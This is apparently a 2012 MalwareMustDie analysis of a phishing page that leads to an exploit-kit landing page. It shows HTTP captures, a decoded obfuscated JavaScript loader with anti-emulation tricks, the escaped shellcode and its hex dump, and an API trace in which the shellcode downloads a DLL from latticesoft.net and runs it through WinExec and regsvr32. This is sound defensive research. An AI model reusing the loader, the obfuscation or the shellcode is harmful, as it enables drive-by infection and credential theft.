# MalwareMustDie - PluginDetect Decoding Guide
# for the Trojan parfeit Investigation
# (Credential Stealer Case)
------------
--18:06:57-- h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.htm
=> `cpa_inform.htm'
Resolving www.irwra.com... 50.116.98.44
Connecting to www.irwra.com|50.116.98.44|:80... connected.
HTTP request sent, awaiting response... HTTP/1.1 200 OK
// real time with Xurl..
@unixfreaxjp /malware]$ Xurl h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.html |jless
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 813 100 813 0 0 1187 0 --:--:-- --:--:-- --:--:-- 4567
Processing request... Banking, Credit Cards, Lending & Investing - CPA
You will be redirected to details of purchase
We must complete few security checks to show your transfer details:
Be sure you have a transfer reference ID. You will be asked to enter it after we check the link. Important: Please be advised that calls to and from your wire service team may be monitored or recorded.
Redirecting to Survey details... Please wait...
------------------------------------------------
--2012-12-22 03:44:27-- h00p://latticesoft.net/detects/continues-little.php
Resolving latticesoft.net (latticesoft.net)... 59.57.247.185
Caching latticesoft.net => 59.57.247.185
Connecting to latticesoft.net (latticesoft.net)|59.57.247.185|:80... connected.
---request begin---
GET /detects/continues-little.php HTTP/1.1
Referer: http://www.irwra.com//wp-content/themes/mantra/uploads/cpa_inform.html
User-Agent: #MalwareMustDie!
Accept: */*
Host: latticesoft.net
Connection: Keep-Alive
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.3.3
Date: Fri, 21 Dec 2012 18:44:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.14
200 OK
Length: unspecified [text/html]
Saving to: `continues-little.php'
2012-12-22 03:44:33 (28.7 KB/s) - `continues-little.php' saved [95903]
--------------------------------------------------------
TRY TWO:
--14:18:07-- h00p://latticesoft.net/detects/continues-little.php
=> `continues-little.php.1'
Resolving latticesoft.net... seconds 0.00, 59.57.247.185
Caching latticesoft.net => 59.57.247.185
Connecting to latticesoft.net|59.57.247.185|:80... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5348 (new refcount 1).
---request begin---
GET /detects/continues-little.php HTTP/1.0
Referer: h00p://www.irwra.com//wp-content/themes/mantra/uploads/cpa_inform.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: latticesoft.net
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.3.3
Date: Sat, 22 Dec 2012 05:17:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.14
---response end---
200 OK
Length: unspecified [text/html]
14:18:13 (25.29 KB/s) - `continues-little.php.1' saved [91337] <=============== the size changes....
---------------
// CHANGES!!!!!! Why? What?
// what had changed??
// let's use the unix diff command to compare the previous code with the new one and see what changes the moronz made:
0x001c1
<
// tags and you're good to go.
// So, the structure of the current obfuscated code is:
a.setAttribute("z0","-[0-9|a-z]...-[0-9|a-z]");
z0+1
:
z29
// And this is the code to feed obfuscated data...
// Set-up for the attribute-based loader. Nothing here is declared with
// var/let, so `dd`, `pp`, `asd`, `a`, `s`, `r` and `i` are all implicit
// globals shared across the whole snippet.
dd="i";          // tag name used with createElement below
pp="e"+"In";     // split-string constant; not referenced anywhere in the visible code
// asd(): walk the attributes z0, z1, z2, ... of the global `a` and append each
// value to the global `s`, stopping at the first missing (falsy) attribute.
// It relies on the caller having reset `s` beforehand.
asd=function()
{
for(i=0;;i++)
{
r=a.getAttribute("z"+i);if(r){s=s+r;}else break;
}};
// Create an element with the tag name held in dd ("i").
a=document.createElement(dd);
// Thus, this is the generator part to crack the code;
// Loader: attach the element, pass an environment check, gather the encoded
// payload from element attributes, decode it and run it.
document.body.appendChild(a);
// Gate on the first <div>'s inline style.left being exactly "". In a browser
// DOM an unset inline property reads as "", so this presumably exists to skip
// DOM emulators or stubs that return undefined — confirm before relying on it.
// The split-string names ("d"+"iv", "getElementsB"+"yTagName", "su"+"bstr",
// "eva"+"l") keep the real identifiers out of the raw source; they are a
// useful signature for detection.
if(document.getElementsByTagName("d"+"iv")[0].style.left==="")
{
ss=String.fromCharCode;   // alias used by the decode loop below
// Rebind `a` to the first element in the document with the tag name held in dd.
a=document["getElementsB"+"yTagName"](dd);
a=a[0];
// asd() appends the values of attributes z0, z1, ... of `a` to `s`, so `s` is
// emptied first; afterwards `a` holds the concatenated encoded text and `s` is
// reset to collect the decoded output.
s=new String();
asd();
a=s;
s=new String();
e=window["eva"+"l"];     // eval obtained via property lookup with a split name
p=parseInt;              // alias used by the decode loop below
// Decode: take two characters at a time, parse them as a base-23 number,
// subtract 24, divide by 3, and emit the result as a char code. When the
// character at the current position is "-", the index is advanced by two
// before the pair is read.
for(i=0;a.length>i;i+=2)
{
if(a["su"+"bstr"](i,1)=="-")i+=2;
s=s+(ss((p(a["substr"](i,2),23)-24)/3));
}
// The decoded text is evaluated only from the catch block, i.e. only when the
// assignment below throws. In a real browser DOM assigning a non-element (the
// NaN produced by the multiplication) to document.body presumably throws; an
// environment where it does not never runs the payload — another
// analysis-evasion style check worth noting when emulating this code.
try
{
document.body*=document;
}
catch(asfas)
{
e("if(1)"+s);
}
}
// And this is the decoding formula to crack:
// here's the formula...
// The decode formula on its own (the same loop as in the loader above): `a`
// is the concatenated encoded string, `s` the output accumulator, `ss` is
// String.fromCharCode and `p` is parseInt. Each two-character group is parsed
// as base 23, then (value - 24) / 3 gives the char code. When the character at
// the current position is "-", the index is advanced by two before the group
// is read.
for(i=0;a.length>i;i+=2)
{
if(a["substr"](i,1)=="-")i+=2;
s=s+(ss((p(a["substr"](i,2),23)-24)/3));
}
// You can reproduce the decoding operation easily by building an
// array from the `a` element's attributes, filling entries 0 to 29 with
// the garbled code one by one, and feeding it into the
// formula.
// And the result is the NEW obfuscated PluginDetect code (v 0.7.9)
var PluginDetect =
{
version : "0.7.9", name : "PluginDetect", handler : function (c, b, a)
{
return function ()
{
c(b, a)
}
}
, openTag : "<", isDefined : function (b)
{
return typeof b != "undefined"
}
, isArray : function (b)
{
return (/array/i).test(Object.prototype.toString.call(b))
:
:(blah! etc)
// let's modify the shellcode snippet to grab the payload:
// Shellcode carrier: the literal is stored reversed; split/reverse/join
// restores the original order, which turns every "!%" into "%!".
var a = "8282!%51c4!%04e4!%25e0!%f551!%e014!%9134!%4451!%54e0!%2191!%9154!%e521!%21a1!%91f4!%1421!%2191!%9174!%2421!%2191!%9114!%f521!%21a1!%9164!%d451!%e0f4!%b181!%2421!%2191!%91e4!%e521!%21a1!%b181!%e451!%7125!%0485!%6085!%44d4!%c5c5!%4414!%b550!%d5d4!%1464!%64c5!%b474!%b570!%b4c5!%c5d4!%c4d4!%c570!%64d4!%c560!%74e4!%d4b5!%14b4!%c5c5!%4494!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e80!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
// Rewrite the "%!" marker to "%u", giving the %uXXXX escape form shown below.
var x=a["replace"](/\%!/g, "%" + "u");
// The author dumps the restored string into the page to read it back.
document.write(x);
↓↓
%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u08e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u4944%u5c5c%u4b41%u5b4d%u4e47%u065c%u4d46%u075c%u4d4c%u4d5c%u5c4b%u075b%u474b%u5c46%u4641%u4d5d%u055b%u4144%u5c5c%u4d44%u5806%u5840%u5217%u154e%u181b%u1a12%u125e%u4e19%u1912%u1242%u181b%u4f0e%u154d%u4619%u1a12%u125f%u4119%u1912%u1242%u4719%u1912%u1241%u4f19%u1a12%u125e%u4519%u1912%u0e45%u1544%u4319%u410e%u155f%u0e52%u4e40%u4c15%u2828
// here's the shellcode (as a hex dump with ASCII column)....
41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 AAAAf......X1.f.
e9 08 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ....0(@.........
ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..].
af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 .....]y..dy~.]..
5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b .+...'.8..\...%+
f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3 .h...7].v.v.+.N.
24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3 $c.n..|.$..+..,.
2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b +..vq..{..@..U$.
5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7 \+....@...B-q...
d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28 .....((((pxBh@.(
28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d ((x..1x}...v8..-
d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab ..@GF((@]ZDE|.>.
ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c .....I....*.Z..,
29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c )((.t.$.,.ZMO[.l
0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40 .,^Z...l....[.{@
d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28 .(((.~$....y.l5(
5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21 _XJ\.l5-.LDD.l5!
28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28 (q..,..l5,iyB(B(
7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e {.B(.~<..]>B({.~
2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 ,B(..${.~,..$.*.
3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 ;o..(].o..(].B(B
d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2 ..~.......f&....
26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07 &.G)....s3.nQ.2.
58 40 5c 5c 58 12 07 07 44 49 5c 5c 41 4b 4d 5b X@\\X...DI\\AKM[
47 4e 5c 06 46 4d 5c 07 4c 4d 5c 4d 4b 5c 5b 07 GN\.FM\.LM\MK\[.
4b 47 46 5c 41 46 5d 4d 5b 05 44 41 5c 5c 44 4d KGF\AF]M[.DA\\DM
06 58 40 58 17 52 4e 15 1b 18 12 1a 5e 12 19 4e .X@X.RN.....^..N
12 19 42 12 1b 18 0e 4f 4d 15 19 46 12 1a 5f 12 ..B....OM..F.._.
19 41 12 19 42 12 19 47 12 19 41 12 19 4f 12 1a .A..B..G..A..O..
5e 12 19 45 12 19 45 0e 44 15 19 43 0e 41 5f 15 ^..E..E.D..C.A_.
52 0e 40 4e 15 4c 28 28 R.@N.L((
// And the API call trace of the shellcode.....
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=http://latticesoft.net/detects/continues-little.php?zf=30:2v:1f:1j:30&ge=1n:2w:1i:1j:1o:1i:1g:2v:1m:1m&l=1k&iw=z&hf=d , lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
----
#MalwareMustDie!
unixfreaxjp /malware]$ date
Sat Dec 22 18:59:02 JST 2012